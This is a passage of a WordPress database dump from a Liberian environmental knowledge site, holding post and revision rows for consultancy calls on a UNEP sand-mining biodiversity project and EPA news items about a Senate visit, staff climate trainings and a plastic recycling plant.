Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Economics-and-Markets-Expert-27.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Economic and Market Expert','','inherit','closed','closed','','5799-revision-v1','','','2026-03-27 14:30:43','2026-03-27 14:30:43','',5799,'https://ekmsliberia.info/?p=5851',0,'revision','',0),(5852,38,'2026-03-27 14:37:39','2026-03-27 14:37:39','','Screenshot 2026-03-27 at 14.34.06','','inherit','open','closed','','screenshot-2026-03-27-at-14-34-06','','','2026-03-27 14:37:39','2026-03-27 14:37:39','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/Screenshot-2026-03-27-at-14.34.06.png',0,'attachment','image/png',0),(5853,38,'2026-03-27 14:49:11','2026-03-27 14:49:11','','Gender and Social Inclusion Expert 27','','inherit','open','closed','','gender-and-social-inclusion-expert-27','','','2026-03-27 14:49:11','2026-03-27 14:49:11','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/Gender-and-Social-Inclusion-Expert-27.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5854,38,'2026-03-27 14:50:19','2026-03-27 14:50:19','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity- friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe project (GEFID 12029), to be executed by the Environmental Protection Agency of Liberia, the National Environmental Agency of The Gambia, and UNEP’s Industry and Economy Division, is currently in its Project Preparation Grant (PPG) phase (December 2025–August 2026). The PPG process is supporting detailed baseline assessments, stakeholder consultations, spatial and market analyses, and the preparation of the CEO Endorsement Request package to ensure a technically robust, inclusive, and nationally aligned full proposal for submission to the GBFF.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\nClick to: <a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Gender-and-Social-Inclusion-Expert-27.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: Consultancy Type & Title: National Consultant – Stakeholder, Gender and Social Inclusion Expert','','inherit','closed','closed','','5812-revision-v1','','','2026-03-27 14:50:19','2026-03-27 14:50:19','',5812,'https://ekmsliberia.info/?p=5854',0,'revision','',0),(5855,38,'2026-03-27 15:45:54','2026-03-27 15:45:54','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Policy-Legal-and-Institutional-Expert-27.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Policy, Legal, and Institutional Expert','','publish','closed','closed','','call-for-expression-of-interest-to-provide-short-term-consultancy-technical-support-national-consultant-policy-legal-and-institutional-expert','','','2026-03-27 15:45:54','2026-03-27 15:45:54','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5855',8,'ekms_bulletin','',0),(5856,38,'2026-03-27 15:30:25','2026-03-27 15:30:25','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n\r\n&nbsp;\r\n\r\nClick to','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Policy, Legal, and Institutional Expert','','inherit','closed','closed','','5855-revision-v1','','','2026-03-27 15:30:25','2026-03-27 15:30:25','',5855,'https://ekmsliberia.info/?p=5856',0,'revision','',0),(5857,38,'2026-03-27 15:44:49','2026-03-27 15:44:49','','Policy, Legal, and Institutional Expert 27','','inherit','open','closed','','policy-legal-and-institutional-expert-27','','','2026-03-27 15:44:49','2026-03-27 15:44:49','',0,'https://ekmsliberia.info/wp-content/uploads/2026/03/Policy-Legal-and-Institutional-Expert-27.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5858,38,'2026-03-27 15:45:54','2026-03-27 15:45:54','<strong>Project Background</strong>\r\n\r\nThe proposed 36-month regional project, led by UNEP under the Global Biodiversity Framework Fund (GBFF), aims to mainstream biodiversity conservation into productive sectors by addressing unsustainable sand extraction in Liberia and The Gambia. Recognizing sand mining as a major driver of coastal erosion, habitat loss, pollution, and biodiversity decline in the West African marine ecoregion, the project adopts a source-to-sea approach to strengthen policy and regulatory frameworks, enhance institutional and technical capacity, promote nature-based solutions, and foster market transformation along the sand value chain. Through baseline assessments, regional knowledge-sharing platforms, regulatory reform, private sector engagement, and support for women, youth, and Indigenous Peoples and Local Communities to transition toward biodiversity-friendly livelihoods, the project seeks to reduce ecological degradation while promoting sustainable economic resilience. With a total GEF financing envelope of approximately USD 4.9 million, the initiative aligns with national biodiversity strategies and GBF Action Areas 3 and 6 to integrate biodiversity safeguards into governance, markets, and investment decisions across the region.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/03/Policy-Legal-and-Institutional-Expert-27.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Expression of Interest to provide Short-Term Consultancy/Technical Support: National Consultant – Policy, Legal, and Institutional Expert','','inherit','closed','closed','','5855-revision-v1','','','2026-03-27 15:45:54','2026-03-27 15:45:54','',5855,'https://ekmsliberia.info/?p=5858',0,'revision','',0),(5860,38,'2026-04-16 11:08:26','2026-04-16 11:08:26','','news today','','inherit','open','closed','','news-today','','','2026-04-16 11:08:26','2026-04-16 11:08:26','',5859,'https://ekmsliberia.info/wp-content/uploads/2026/04/news-today.jpeg',0,'attachment','image/jpeg',0),(5861,38,'2026-04-16 11:10:44','2026-04-16 11:10:44','','today news11','','inherit','open','closed','','today-news11','','','2026-04-16 11:10:44','2026-04-16 11:10:44','',5859,'https://ekmsliberia.info/wp-content/uploads/2026/04/today-news11.jpeg',0,'attachment','image/jpeg',0),(5862,38,'2026-04-16 11:13:14','2026-04-16 11:13:14','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia yesterday welcomed the Honorable Pro Tempore of the Liberian Senate, Nyonblee Karnga-Lawrence, for a high-level visit aimed at strengthening collaboration between the Legislature and the country’s lead environmental institution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5860,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/04/news-today-1024x768.jpeg\" alt=\"\" class=\"wp-image-5860\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>During the briefing, the Executive Director provided a comprehensive overview of the EPA’s major achievements in 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Notably, the agency completed the decentralization of EPA operations to all 15 counties, significantly enhancing environmental monitoring and compliance nationwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA also mobilized approximately USD 10 million in climate finance to support agriculture value chains and resilience under the ARREST Agenda. Progress was reported on critical coastal defense projects in West Point and Greenville, Sinoe County, alongside continued efforts to document county action plans for Liberia’s 15 counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Director emphasized strengthened enforcement actions, noting that holding polluters accountable has directly contributed to safeguarding environmental protection, public health, and saving lives. Important regulatory strides were highlighted, including the introduction of Net-Metering and Noise Pollution regulations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Looking ahead to 2026, the EPA outlined its priorities, including the construction of new EPA offices in five counties, expansion of the climate finance pipeline, and intensified enforcement of the Environmental Protection and Management Law (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The briefing also acknowledged challenges, such as the rapid rise in excavator use contributing to forest degradation from unregulated mining, the illegal importation of hazardous chemicals like cyanide, ongoing wetland degradation, and persistent budgetary constraints.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In response, the Agency called for increased Senate support through legislative reforms, enhanced budget allocations, and the approval of a USD 400,000 supplementary budget for wetland protection equipment, along with broader job creation strategies linked to environmental management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As part of the visit, the Senate Pro Tempore toured the EPA’s state-of-the-art environmental laboratory. The Director of Environmental Research and Radiation Services (ERRS), Mr. Rafael Ngumbu, provided a detailed overview of the facility’s capabilities, which include advanced testing of soil, water, and air quality to support pollution control, environmental compliance, and public health protection. The laboratory also plays a critical role in chemical analysis, environmental forensics, climate-related research, and emerging areas such as blue carbon assessment and natural capital accounting. It supports national and international reporting obligations, early warning systems, and evidence-based policymaking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In her remarks, the Senate Pro Tempore expressed strong appreciation for the EPA’s work and leadership in environmental protection and climate action. She reaffirmed the Senate’s commitment to working closely with the EPA to ensure a safe and sustainable environment for all Liberians and pledged to organize a broader visit by members of Senate leadership to gain deeper insight into the Agency’s work and impact.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ultimately, the visit marks an important step in reinforcing legislative–executive collaboration to advance Liberia’s environmental governance, climate resilience, and sustainable development agenda.</p>\n<!-- /wp:paragraph -->','EPA Hosts Senate Pro Tempore Nyonblee Karnga-Lawrence for High-Level Visit Monrovia, Liberia – April 15, 2026','','inherit','closed','closed','','5859-revision-v1','','','2026-04-16 11:13:14','2026-04-16 11:13:14','',5859,'https://ekmsliberia.info/?p=5862',0,'revision','',0),(5881,38,'2026-04-29 11:32:38','2026-04-29 11:32:38','<!-- wp:paragraph -->\n<p>Monrovia, April 29, 2026_Three staff from the Environmental Protection Agency of Liberia have returned home after completing an international training program on carbon neutrality and green economy development in the People\'s Republic of China.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The staff are are from the Compliance and Enforcement Department of the agency. They are Victoria Jones Harmon, Head of EPA Inspectors in Margibi County, Victor Gblee, Head of Inspectors in Bong County, and Romel Fahnbulleh, an EPA Inspector in Montserrado County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training, held from April 10 to April 23, was organized under the Global Development Initiative. It brought together participants from different countries to build knowledge and strengthen cooperation on climate change and sustainable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the program, the participants learned about carbon peaking, carbon neutrality, and ways countries can grow their economies while protecting the environment. These are key areas under the United Nations Framework Convention on Climate Change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training included classroom lectures, group discussions, and field visits. The inspectors gained both theory and practical knowledge on how countries can move to low-carbon development and build strong systems to respond to climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>They also learned about China’s development model, including its focus on green growth and environmental protection. As part of the training, they visited renewable energy sites, digital economy centers, and rural development projects. These visits helped them understand how China is working to achieve its carbon goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The program also included discussions on how digital tools can support green transformation. Participants engaged with experts and research institutions, gaining ideas that can be applied in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition, the inspectors took part in cultural activities, including visits to the Great Wall of China and the Temple of Heaven, helping to promote cultural exchange and learning.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Upon their return, the three inspectors visited the Executive Director of the EPA, Emmanuel K. Urey Yarkpawolo, at his office in Monrovia. They thanked him for the opportunity and support that made their participation possible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>They said the training has improved their skills and knowledge and will help them do their work better. They promised to use what they learned to support environmental protection and strengthen enforcement across Liberia. They also committed to sharing the knowledge with other staff of the agency.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inspectors also praised the Chinese Embassy in Liberia for providing the opportunity. They described the program as important for building the capacity of Liberian professionals and strengthening cooperation between Liberia and China.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Dr. Yarkpawolo welcomed the inspectors back and congratulated them for completing the training. He said building the capacity of EPA staff remains a key focus of his leadership.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that giving staff international exposure helps improve the work of the agency and prepares them to better handle environmental challenges. He encouraged the inspectors to apply what they learned and train others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also reaffirmed his commitment to continue working with partners to provide more training opportunities. He said such efforts will help strengthen the EPA and support sustainable development in Liberia.</p>\n<!-- /wp:paragraph -->','EPA Staff Returns From China After Completing Climate Training in Carbon Neutrality and Green Economy Development','','publish','open','open','','epa-staff-returns-from-china-after-completing-climate-training-in-carbon-neutrality-and-green-economy-development','','','2026-04-29 11:32:41','2026-04-29 11:32:41','',0,'https://ekmsliberia.info/?p=5881',14,'post','',0),(5865,38,'2026-04-20 12:45:00','2026-04-20 12:45:00','<!-- wp:paragraph -->\n<p>Senegal, April 19, 2026 — Two staffers from Liberia’s Environmental Protection Agency (EPA) have completed a regional capability-building training for Least Developed Countries (LDCs) in climate change negotiations, underscoring Liberia’s commitment to stronger representation on the world stage. The participants were Mrs. Danise Love Dennis-Dodoo, Head of Media and Corporate Communications, and Mr. Jeremiah Mulbah, Communications Specialist, with Mrs. Dodoo leading the Liberian delegation throughout the program.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training, held in La Somone, Senegal from April 13–15, 2026, brought together more than 60 negotiators from Anglophone and Francophone African countries to sharpen practical negotiating skills under the United Nations Framework Convention on Climate Change (UNFCCC) process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Dodoo led Liberia’s delegation, steering the team’s engagement across thematic areas, while Mr. Mulbah contributed his expertise in communications strategy and policy framing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the practical sessions on how negotiators take the floor, Mrs. Dodoo served as the African Group of Negotiators (AGN) Chair, guiding the group’s floor presence and strategy, and Mr. Mulbah followed suit by acting as the European Union (EU) Chair, representing one of the core blocs under UNFCCC negotiations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two Liberian staff focused their efforts on critical negotiation themes: Mrs. Dodoo concentrated on Transparency, while Mr. Mulbah tackled Loss and Damage, areas central to Liberia’s climate resilience and adaptation needs. This arrangement not only highlighted Liberia’s current priorities but also showcased the country’s readiness to engage substantively in international dialogue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the program unfolded, the Liberian team demonstrated not only technical insight but also a readiness to translate global negotiations into actionable outcomes for local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The organizers—ENDA Énergie and the International Institute for Environment and Development—worked in collaboration with Legal Response International and in partnership with the LDC Group, bringing together an enriching mix of expertise and practical exercises. The training aimed to empower participants to articulate LDC’s climate priorities clearly, advocate for necessary support, and strengthen multi-stakeholder collaboration at future negotiations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The significance of this participation goes beyond personal skill development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia, a nation with a small greenhouse gas footprint, continues to bear the brunt of climate impacts such as flooding, heavy rainfall, and coastal erosion. The knowledge gained from this training equips Liberia to push for stronger international backing for resilience, adaptation, and funding that can help communities back home.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a substantial signal of Liberia’s growing readiness, both staff completed a post-training assessment and were awarded certificates of completion, recognizing their mastery of the program’s core competencies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the close of the training, Mrs. Dodoo expressed gratitude to the EPA for the support that made their participation possible and highlighted how the experience enhances Liberia’s voice on the world stage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She emphasized that the capacity-building effort will enable Liberia to speak more forcefully and coherently in international climate conversations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We may not be a large emitter, but Liberia is among those feeling the severe effects of climate change,” she remarked.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Trainings like this prepare Liberia’s next generation of negotiators to take a national role and secure the assistance our communities need.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia also extends heartfelt appreciation to the organizers for the impactful training and for enabling Liberian representatives to engage with confidence and clarity. The knowledge and connections gained through ENDA Énergie, IIED, Legal Response International, and the LDC Group will be shared across the EPA to strengthen the institution’s ongoing climate diplomacy and advocacy.</p>\n<!-- /wp:paragraph -->','Liberia EPA Staff Complete Regional Climate Negotiations Training, Earn Certificates','','publish','open','open','','liberia-epa-staff-complete-regional-climate-negotiations-training-earn-certificates','','','2026-04-22 12:51:30','2026-04-22 12:51:30','',0,'https://ekmsliberia.info/?p=5865',19,'post','',0),(5866,38,'2026-04-22 12:50:39','2026-04-22 12:50:39','','Media pic','','inherit','open','closed','','media-pic','','','2026-04-22 12:50:39','2026-04-22 12:50:39','',5865,'https://ekmsliberia.info/wp-content/uploads/2026/04/Media-pic.jpg',0,'attachment','image/jpeg',0),(5867,38,'2026-04-22 12:51:27','2026-04-22 12:51:27','<!-- wp:paragraph -->\n<p>Senegal, April 19, 2026 — Two staffers from Liberia’s Environmental Protection Agency (EPA) have completed a regional capability-building training for Least Developed Countries (LDCs) in climate change negotiations, underscoring Liberia’s commitment to stronger representation on the world stage. The participants were Mrs. Danise Love Dennis-Dodoo, Head of Media and Corporate Communications, and Mr. Jeremiah Mulbah, Communications Specialist, with Mrs. Dodoo leading the Liberian delegation throughout the program.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training, held in La Somone, Senegal from April 13–15, 2026, brought together more than 60 negotiators from Anglophone and Francophone African countries to sharpen practical negotiating skills under the United Nations Framework Convention on Climate Change (UNFCCC) process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Dodoo led Liberia’s delegation, steering the team’s engagement across thematic areas, while Mr. Mulbah contributed his expertise in communications strategy and policy framing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the practical sessions on how negotiators take the floor, Mrs. Dodoo served as the African Group of Negotiators (AGN) Chair, guiding the group’s floor presence and strategy, and Mr. Mulbah followed suit by acting as the European Union (EU) Chair, representing one of the core blocs under UNFCCC negotiations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two Liberian staff focused their efforts on critical negotiation themes: Mrs. Dodoo concentrated on Transparency, while Mr. Mulbah tackled Loss and Damage, areas central to Liberia’s climate resilience and adaptation needs. This arrangement not only highlighted Liberia’s current priorities but also showcased the country’s readiness to engage substantively in international dialogue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the program unfolded, the Liberian team demonstrated not only technical insight but also a readiness to translate global negotiations into actionable outcomes for local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The organizers—ENDA Énergie and the International Institute for Environment and Development—worked in collaboration with Legal Response International and in partnership with the LDC Group, bringing together an enriching mix of expertise and practical exercises. The training aimed to empower participants to articulate LDC’s climate priorities clearly, advocate for necessary support, and strengthen multi-stakeholder collaboration at future negotiations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The significance of this participation goes beyond personal skill development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia, a nation with a small greenhouse gas footprint, continues to bear the brunt of climate impacts such as flooding, heavy rainfall, and coastal erosion. The knowledge gained from this training equips Liberia to push for stronger international backing for resilience, adaptation, and funding that can help communities back home.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a substantial signal of Liberia’s growing readiness, both staff completed a post-training assessment and were awarded certificates of completion, recognizing their mastery of the program’s core competencies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the close of the training, Mrs. Dodoo expressed gratitude to the EPA for the support that made their participation possible and highlighted how the experience enhances Liberia’s voice on the world stage.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She emphasized that the capacity-building effort will enable Liberia to speak more forcefully and coherently in international climate conversations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We may not be a large emitter, but Liberia is among those feeling the severe effects of climate change,” she remarked.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Trainings like this prepare Liberia’s next generation of negotiators to take a national role and secure the assistance our communities need.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia also extends heartfelt appreciation to the organizers for the impactful training and for enabling Liberian representatives to engage with confidence and clarity. The knowledge and connections gained through ENDA Énergie, IIED, Legal Response International, and the LDC Group will be shared across the EPA to strengthen the institution’s ongoing climate diplomacy and advocacy.</p>\n<!-- /wp:paragraph -->','Liberia EPA Staff Complete Regional Climate Negotiations Training, Earn Certificates','','inherit','closed','closed','','5865-revision-v1','','','2026-04-22 12:51:27','2026-04-22 12:51:27','',5865,'https://ekmsliberia.info/?p=5867',0,'revision','',0),(5868,38,'2026-04-19 17:41:00','2026-04-19 17:41:00','<!-- wp:paragraph -->\n<p>Monrovia, Liberia, April 19, 2026 – The Government of Liberia, through the Environmental Protection Agency (EPA) and in partnership with the private sector, on Friday, April 17, 2026, marked a significant milestone in advancing sustainable development with the official commissioning of the Duraplast Plastic Recycling Plant and the groundbreaking of the Sethi Ferro Fabrik Steel Plant – Phase II at the Monrovia Industrial Park. The ceremony was graced by His Excellency President Joseph Nyuma Boakai, Sr., alongside senior government officials, development partners, and private sector leaders .</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his remarks, President Boakai reaffirmed his Administration’s commitment to environmental sustainability, job creation, and private sector-led growth, emphasizing that Liberia must move from wastefulness to productivity by turning environmental challenges into economic opportunities. The President highlighted that initiatives such as the Duraplast facility represent practical steps toward achieving national development priorities under the ARREST Agenda, particularly in sanitation, youth empowerment, and industrialization.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5869,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2026/04/CEO-738x1024.jpg\" alt=\"\" class=\"wp-image-5869\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the event, the Executive Director of the Environmental Protection Agency, Dr. Emmanuel K. Urey Yarkpawolo, emphasized that the project directly responds to the triple planetary crisis—climate change, biodiversity loss, and pollution. He noted that plastic pollution remains a major environmental threat in Liberia, contributing to clogged drainage systems, soil degradation, and water contamination.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo stressed that under the leadership of President Boakai, the EPA, in collaboration with city corporations and stakeholders, developed the 2024 National Solid Waste Management Policy, a private sector-driven framework designed to modernize waste management and promote investment in recycling and waste-to-energy solutions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He further highlighted that the Sethi Group of Companies is among the first to operationalize this policy through the establishment of the Duraplast recycling facility, while additional investments are already underway, including a similar plant in Bensonville which is a waste-to-energy initiative by Green Guard Eco Solution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA and the Monrovia City Corporation, with support from MRV Canada, have also established an organic waste composting facility in Fiamah to convert organic waste into compost for agricultural use.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Duraplast Plastic Recycling Plant is expected to process up to 600 metric tons of plastic waste per month, significantly reducing urban pollution while supporting the circular economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The facility incorporates a closed-loop water filtration system to prevent chemical runoff into the Mesurado River and surrounding wetlands, as well as high-efficiency thermal systems to minimize air emissions. These measures demonstrate strong alignment with national environmental standards and international best practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Beyond its environmental benefits, the project is poised to generate substantial socio-economic impact. It is expected to create over 200 direct jobs and more than 1,000 indirect livelihood opportunities, particularly benefiting youth and women engaged in community-based waste collection enterprises.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The facility will also promote worker safety through strict occupational health and safety protocols, including mandatory use of personal protective equipment and fair labor practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In line with the Government’s “Buy Liberia” initiative, the plant will transform plastic waste—such as water sachets, bottles, and containers—into locally manufactured products including pipes, buckets, and chairs, thereby reducing reliance on imports and strengthening domestic industry.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The facility will recycle key plastic types including LDPE, HDPE, PET, and PP, which constitute a significant portion of Liberia’s urban waste stream.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo concluded by commending the Sethi Group of Companies for their investment and leadership, noting that the project represents a turning point in Liberia’s transition from waste management to resource recovery and green industrialization.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is not just a plant,” he stated. “It is a symbol of a new direction for Liberia—where waste becomes wealth, where policy meets action, and where environmental protection drives economic transformation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Photos credit: Executive Mansion Liberia</p>\n<!-- /wp:paragraph -->','President Boakai, EPA, and Partners Commission Major Plastic Recycling Plant in Monrovia','','publish','open','open','','president-boakai-epa-and-partners-commission-major-plastic-recycling-plant-in-monrovia','','','2026-04-22 17:47:34','2026-04-22 17:47:34','',0,'https://ekmsliberia.info/?p=5868',18,'post','',0),(5869,38,'2026-04-22 17:44:30','2026-04-22 17:44:30','','CEO','','inherit','open','closed','','ceo','','','2026-04-22 17:44:30','2026-04-22 17:44:30','',5868,'https://ekmsliberia.info/wp-content/uploads/2026/04/CEO.jpg',0,'attachment','image/jpeg',0),(5870,38,'2026-04-22 17:44:59','2026-04-22 17:44:59','','sette new2','','inherit','open','closed','','sette-new2','','','2026-04-22 17:44:59','2026-04-22 17:44:59','',5868,'https://ekmsliberia.info/wp-content/uploads/2026/04/sette-new2.jpg',0,'attachment','image/jpeg',0),(5871,38,'2026-04-22 17:47:31','2026-04-22 17:47:31','<!-- wp:paragraph -->\n<p>Monrovia, Liberia, April 19, 2026 – The Government of Liberia, through the Environmental Protection Agency (EPA) and in partnership with the private sector, on Friday, April 17, 2026, marked a significant milestone in advancing sustainable development with the official commissioning of the Duraplast Plastic Recycling Plant and the groundbreaking of the Sethi Ferro Fabrik Steel Plant – Phase II at the Monrovia Industrial Park. The ceremony was graced by His Excellency President Joseph Nyuma Boakai, Sr., alongside senior government officials, development partners, and 